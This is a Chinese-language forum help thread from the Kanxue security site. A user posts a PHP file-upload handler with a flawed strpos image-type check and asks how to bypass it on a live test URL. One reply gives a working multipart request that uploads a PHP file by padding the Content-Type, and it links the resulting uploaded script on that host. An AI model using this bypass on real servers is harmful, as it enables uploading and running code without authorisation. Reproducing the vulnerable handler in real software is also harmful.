关于php上传漏洞问题请教-求助问答-看雪-安全社区|安全招聘|kanxue.com

未解决关于php上传漏洞问题请教

2021-1-16 06:49 1790

未解决关于php上传漏洞问题请教

漠北蝈蝈

2021-1-16 06:49

1790

<?php
 
 
 if(empty($_FILES['file']))
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传二维码']);exit;
   }
 
   $file = $_FILES["file"];
 
   if ($file["error"] > 0)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传图片信息错误']);exit;
 
   }
 
   if(strpos($file["type"],'image') == false)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传图片']);exit;
   }
 
   $temp = explode(".", $file["name"]);
   $extension = end($temp);
 
 
   $new_path = 'upload/'.time().rand(1000,9999).'.'.$extension;
 
   if(move_uploaded_file($file["tmp_name"], $new_path))
   {
       echo json_encode(['isSuccess'=>true,'msg'=>'上传成功','file'=>$new_path]);
   }
   else
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传失败']);exit;
   }

if(strpos($file["type"],'image') == false)
这是判断image字符串在$file['type']中第一次出现的位置
我这个php版本是0 然后0==false是成立的
可就是传不上去，我朋友非说能传上去。
http://ag.1nj6xv.id/agent@991688/tx_upload.php 这是测试地址
burp改包测试不行，有老哥能突破吗

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

收藏・0

免费・0

打赏

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2021-1-16 09:05 2 楼 0 https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-6&spm=1001.2101.3001.4242 这个吗？没有前端，没法测试
零加一雪币： 2035 活跃值： (4940) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 141 关注私信	零加一 3 2021-1-16 09:55 3 楼 0 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468--
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:34 4 楼 0 多谢多谢
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:35 5 楼 0 零加一 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572 ... 多谢老哥，明白了
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:35 6 楼 0 kxzpy https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-tas ... 多谢老哥
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

漠北蝈蝈

发帖

回帖

RANK

关注

私信

他的文章

[求助]麻烦看下源码审计结果是否有漏洞

[求助]大佬们帮忙看看我的源码是否有漏洞

关于php上传漏洞问题请教

[求助]有没有大厂商的任意 URL 跳转

[求助]这种QQ短连接从哪里分享出来的

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2021-1-16 09:05 2 楼 0 https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-6&spm=1001.2101.3001.4242 这个吗？没有前端，没法测试
零加一雪币： 2035 活跃值： (4940) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 141 关注私信	零加一 3 2021-1-16 09:55 3 楼 0 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468--
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:34 4 楼 0 多谢多谢
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:35 5 楼 0 零加一 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572 ... 多谢老哥，明白了
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 2021-1-16 14:35 6 楼 0 kxzpy https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-tas ... 多谢老哥
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

未解决 关于php上传漏洞问题请教

未解决关于php上传漏洞问题请教